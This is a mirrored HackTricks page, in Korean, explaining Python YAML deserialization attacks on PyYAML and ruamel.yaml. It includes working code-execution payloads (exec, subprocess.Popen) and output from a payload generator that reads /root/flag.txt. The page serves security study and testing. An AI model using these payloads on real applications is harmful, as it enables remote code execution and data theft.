mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
144 lines
5.7 KiB
Markdown
144 lines
5.7 KiB
Markdown
# Python Yaml Deserialization
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
## Yaml **Deserialization**
|
|
|
|
**Yaml** 파이썬 라이브러리는 원시 데이터뿐만 아니라 **파이썬 객체를 직렬화**할 수 있습니다:
|
|
```
|
|
print(yaml.dump(str("lol")))
|
|
lol
|
|
...
|
|
|
|
print(yaml.dump(tuple("lol")))
|
|
!!python/tuple
|
|
- l
|
|
- o
|
|
- l
|
|
|
|
print(yaml.dump(range(1,10)))
|
|
!!python/object/apply:builtins.range
|
|
- 1
|
|
- 10
|
|
- 1
|
|
```
|
|
**튜플**은 원시 데이터 유형이 아니므로 **직렬화**되었습니다. **range**도 마찬가지입니다(내장 함수에서 가져옴).
|
|
|
|
.png>)
|
|
|
|
**safe_load()** 또는 **safe_load_all()**는 SafeLoader를 사용하며 **클래스 객체 역직렬화**를 지원하지 않습니다. 클래스 객체 역직렬화 예:
|
|
```python
|
|
import yaml
|
|
from yaml import UnsafeLoader, FullLoader, Loader
|
|
data = b'!!python/object/apply:builtins.range [1, 10, 1]'
|
|
|
|
print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10)
|
|
print(yaml.load(data, Loader=Loader)) #range(1, 10)
|
|
print(yaml.load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
|
print(yaml.load_all(data, Loader=Loader)) #<generator object load_all at 0x7fc4c6d8f040>
|
|
print(yaml.load_all(data, Loader=UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
|
|
print(yaml.load_all(data, Loader=FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
|
|
print(yaml.unsafe_load(data)) #range(1, 10)
|
|
print(yaml.full_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
|
print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
|
|
|
#The other ways to load data will through an error as they won't even attempt to
|
|
#deserialize the python object
|
|
```
|
|
이전 코드는 직렬화된 파이썬 클래스를 로드하기 위해 **unsafe_load**를 사용했습니다. 이는 **버전 >= 5.1**에서 load()에 Loader가 지정되지 않거나 Loader=SafeLoader로 설정된 경우 **직렬화된 파이썬 클래스나 클래스 속성을 역직렬화하는 것을 허용하지 않기 때문입니다.**
|
|
|
|
### 기본 익스플로잇
|
|
|
|
**슬립을 실행하는 방법**에 대한 예:
|
|
```python
|
|
import yaml
|
|
from yaml import UnsafeLoader, FullLoader, Loader
|
|
data = b'!!python/object/apply:time.sleep [2]'
|
|
print(yaml.load(data, Loader=UnsafeLoader)) #Executed
|
|
print(yaml.load(data, Loader=Loader)) #Executed
|
|
print(yaml.load_all(data))
|
|
print(yaml.load_all(data, Loader=Loader))
|
|
print(yaml.load_all(data, Loader=UnsafeLoader))
|
|
print(yaml.load_all(data, Loader=FullLoader))
|
|
print(yaml.unsafe_load(data)) #Executed
|
|
print(yaml.full_load_all(data))
|
|
print(yaml.unsafe_load_all(data))
|
|
```
|
|
### 취약한 .load("\<content>") 로더 없이
|
|
|
|
**구버전**의 pyyaml은 무언가를 로드할 때 **로더를 지정하지 않으면** 역직렬화 공격에 취약했습니다: `yaml.load(data)`
|
|
|
|
[**취약점 설명은 여기에서 찾을 수 있습니다**](https://hackmd.io/@defund/HJZajCVlP)**.** 해당 페이지에서 제안된 **익스플로잇**은:
|
|
```yaml
|
|
!!python/object/new:str
|
|
state: !!python/tuple
|
|
- 'print(getattr(open("flag\x2etxt"), "read")())'
|
|
- !!python/object/new:Warning
|
|
state:
|
|
update: !!python/name:exec
|
|
```
|
|
또는 **@ishaack가 제공한 이 한 줄**을 사용할 수도 있습니다:
|
|
```yaml
|
|
!!python/object/new:str {
|
|
state:
|
|
!!python/tuple [
|
|
'print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))',
|
|
!!python/object/new:Warning { state: { update: !!python/name:exec } },
|
|
],
|
|
}
|
|
```
|
|
**최근 버전**에서는 **`Loader`** 없이 **`.load()`**를 **더 이상 호출할 수 없으며**, **`FullLoader`**는 **더 이상 이 공격에 취약하지 않습니다.**
|
|
|
|
## RCE
|
|
|
|
사용자 정의 페이로드는 **PyYAML** 또는 **ruamel.yaml**과 같은 Python YAML 모듈을 사용하여 생성할 수 있습니다. 이러한 페이로드는 적절한 정화 없이 신뢰할 수 없는 입력을 역직렬화하는 시스템의 취약점을 악용할 수 있습니다.
|
|
```python
|
|
import yaml
|
|
from yaml import UnsafeLoader, FullLoader, Loader
|
|
import subprocess
|
|
|
|
class Payload(object):
|
|
def __reduce__(self):
|
|
return (subprocess.Popen,('ls',))
|
|
|
|
deserialized_data = yaml.dump(Payload()) # serializing data
|
|
print(deserialized_data)
|
|
|
|
#!!python/object/apply:subprocess.Popen
|
|
#- ls
|
|
|
|
print(yaml.load(deserialized_data, Loader=UnsafeLoader))
|
|
print(yaml.load(deserialized_data, Loader=Loader))
|
|
print(yaml.unsafe_load(deserialized_data))
|
|
```
|
|
### Payload 생성 도구
|
|
|
|
도구 [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)는 **Pickle, PyYAML, jsonpickle 및 ruamel.yaml**을 악용하기 위한 파이썬 역직렬화 페이로드를 생성하는 데 사용할 수 있습니다.
|
|
```bash
|
|
python3 peas.py
|
|
Enter RCE command :cat /root/flag.txt
|
|
Enter operating system of target [linux/windows] . Default is linux :linux
|
|
Want to base64 encode payload ? [N/y] :
|
|
Enter File location and name to save :/tmp/example
|
|
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All
|
|
Done Saving file !!!!
|
|
|
|
cat /tmp/example_jspick
|
|
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}
|
|
|
|
cat /tmp/example_pick | base64 -w0
|
|
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg==
|
|
|
|
cat /tmp/example_yaml
|
|
!!python/object/apply:subprocess.Popen
|
|
- !!python/tuple
|
|
- cat
|
|
- /root/flag.txt
|
|
```
|
|
### References
|
|
|
|
- [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
|
|
- [https://net-square.com/yaml-deserialization-attack-in-python.html](https://net-square.com/yaml-deserialization-attack-in-python.html)
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|